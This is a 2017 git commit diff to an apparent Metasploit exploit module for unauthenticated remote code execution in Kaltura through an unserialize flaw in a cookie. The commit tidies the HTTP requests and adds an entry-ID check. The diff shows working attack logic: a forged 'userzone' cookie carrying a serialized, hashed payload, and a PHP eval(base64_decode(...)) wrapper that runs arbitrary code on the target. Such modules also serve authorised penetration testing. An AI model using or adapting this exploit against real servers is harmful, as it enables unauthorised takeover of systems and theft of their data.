Add entry_id verification; clean up http request calls

rverton · rverton · commit 0ac7e0926cf2 · 2017-10-23T15:19:35.000+02:00
diff --git a/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb b/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb
@@ -74,7 +74,11 @@ def check
 
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"),
+      'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+      'vars_get' => {
+        'list_type' => '15',
+        'entry_id' => entry_id
+      },
       'headers' => {
         'Cookie' => "userzone=#{encoded}#{hash}"
       }
@@ -85,12 +89,29 @@ def check
       Exploit::CheckCode::Safe
     elsif res && res.body.include?(r)
       Exploit::CheckCode::Vulnerable
+    elsif not self.check_entryid()
+      print_error("Invalid ENTRYID")
+      Exploit::CheckCode::Safe
     else
-      print_warning("Did you use a valid entry_id?")
       Exploit::CheckCode::Safe
     end
   end
 
+  def check_entryid
+    entry_id = datastore['ENTRYID']
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+      'vars_get' => {
+        'list_type' => '15',
+        'entry_id' => entry_id
+      }
+    )
+
+    return res.body.include? entry_id
+
+  end
+
   def exploit
     entry_id = datastore['ENTRYID']
     cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
@@ -109,7 +130,11 @@ def exploit
 
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"),
+      'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+      'vars_get' => {
+        'list_type' => '15',
+        'entry_id' => entry_id
+      },
       'headers' => {
         'Cookie' => "userzone=#{encoded}#{hash}"
       }
@@ -118,7 +143,7 @@ def exploit
     if res and res.redirect?
       print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}")
     elsif res and res.code != 200
-        print_error("Unexpected response...")
+        print_error('Unexpected response...')
     else
         print_status("Output: #{res.body}")
     end
